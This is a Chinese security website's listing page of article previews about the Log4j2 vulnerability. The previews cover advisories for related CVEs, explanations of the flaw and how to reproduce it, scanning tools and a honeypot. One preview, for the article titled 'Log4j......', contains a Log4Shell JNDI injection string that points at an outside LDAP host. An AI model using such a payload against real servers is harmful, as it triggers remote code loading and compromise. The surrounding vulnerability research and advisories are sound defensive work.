logj - 第 16 | CN-SEC 中文网

安全文章

浅谈 Log4j2 漏洞

0x00 前言最近的 Log4j2 漏洞在安全圈引起了轩然大波，可以说是核弹级别的漏洞，无论是渗透、研发、安服、研究，所有人都在学习和复现这个漏洞，由于其覆盖面广，引用次数庞大，直接成为可以与永恒之...

01月07日255 views评论

阅读全文

安全文章

万物皆可 API！

这是「进击的Coder」的第 544 篇技术分享作者：崔庆才今天看到一个开源项目，叫做 Command2API，感觉挺有意思的，分享给大家。起源关于这个项目为什么诞生，原 Repo 有这么一...

01月02日92 views评论

阅读全文

SecIN安全技术社区

简单梳理Log4j的漏洞原理以及复现

前言前几天安全圈子就像过了年一样热闹，那晚我也很惊讶。本来正在苦逼写javaEE项目，随后打算摸鱼的，突然看到了朋友圈有大佬讲log4j有漏洞，好巧！我当时正在用这个。随后就是各大公众号、SRC，实...

12月31日593 views已关闭评论

阅读全文

SecIN安全技术社区

Command2API - 万物皆可API

前言近期Log4j漏洞席卷而来，大家都忙得不可开交，对于攻击者来说这是好用的利器，而对于防御者来说这是一场与时间赛跑的应急挑战。大家都在忙着处理这个漏洞，关于这个漏洞的细节就不多说了，说一下我发现的...

12月31日69 views已关闭评论

阅读全文

安全新闻

“化学反应”：log4j JNDI fuzz 与被动扫描

01 Log4j JNDI Lookup 潜在威胁 log4j 的黑盒漏洞检测其实是一个老大难的问题，不像 “正常” 的漏洞有明确的输入点，以及利用方式。他的输...

12月17日7 views评论

阅读全文

安全漏洞

漏洞风险提示 | Apache Log4j2远程代码执行绕过漏洞（CVE-2021-45046）

长亭漏洞风险提示 Apache Log4j2远程代码执行绕过漏洞（...

12月16日489 views评论

阅读全文

安全漏洞

【漏洞通告】Apache Log4j 代码执行漏洞 CVE-2021-4104

漏洞名称 : Apache Log4j 代码执行漏洞组件名称 : Apache Log4j影响范围：Apache Log4j 1.x漏洞类型：代码执行利用条件：1、用户认证：不需要...

12月16日1,359 views评论

阅读全文

安全新闻

【安全圈】Log4j漏洞可能需要数月甚至数年时间才能妥善解决

关键词Log4j漏洞网络安全专家认为 CVE-2021-44228 的普遍性以及容易被利用，这个 Log4j 中的远程代码执行漏洞可能需要数月甚至数年时间才能得到妥善解决。McAfee Enterpr...

12月16日157 views评论

阅读全文

安全漏洞

【漏洞通告】Apache Log4j2 拒绝服务漏洞CVE-2021-45046

漏洞名称 : Apache Log4j2 拒绝服务漏洞组件名称 : Apache Log4j2影响范围：2.0.0 ≤ Apache Log4j2 < 2.16.0...

12月16日472 views评论

阅读全文

安全文章

Log4j......

#这是一篇随手水文=${jndi:ldap://{{2xxxx.maliciouskr.cc/poc} 开源项目 Log4j ，网传只有三个人用业余时间在搞，因...

12月14日223 views评论

阅读全文

安全文章

log4j 1.x 与 logback 的鸡肋RCE讨论

0x01 写在前面对 log4j2 漏洞的后续研究中，发现一些有趣的东西，记录分享一下0x02 log4j 真的在任何情况不存在 JNDI注入吗？首先提出一个问题，log4j 真的在任何情况不存在 J...

12月13日48 views评论

阅读全文

安全文章

工具|log4j2burpscanner、 Log4j 漏洞构造的蜜罐

1、利用 Log4j 漏洞构造的蜜罐这个蜜罐运行假的 Minecraft 服务器（1.17.1）等待被利用。有效载荷类保存到payloads/目录。用法：git clone https://githu...

12月12日1,002 views已关闭评论

阅读全文

浅谈 Log4j2 漏洞

万物皆可 API！

简单梳理Log4j的漏洞原理以及复现

Command2API - 万物皆可API

“化学反应”：log4j JNDI fuzz 与被动扫描

漏洞风险提示 | Apache Log4j2远程代码执行绕过漏洞（CVE-2021-45046）

【漏洞通告】Apache Log4j 代码执行漏洞 CVE-2021-4104

【安全圈】Log4j漏洞可能需要数月甚至数年时间才能妥善解决

【漏洞通告】Apache Log4j2 拒绝服务漏洞CVE-2021-45046

Log4j......

log4j 1.x 与 logback 的鸡肋RCE讨论

工具|log4j2burpscanner、 Log4j 漏洞构造的蜜罐

在线咨询

微信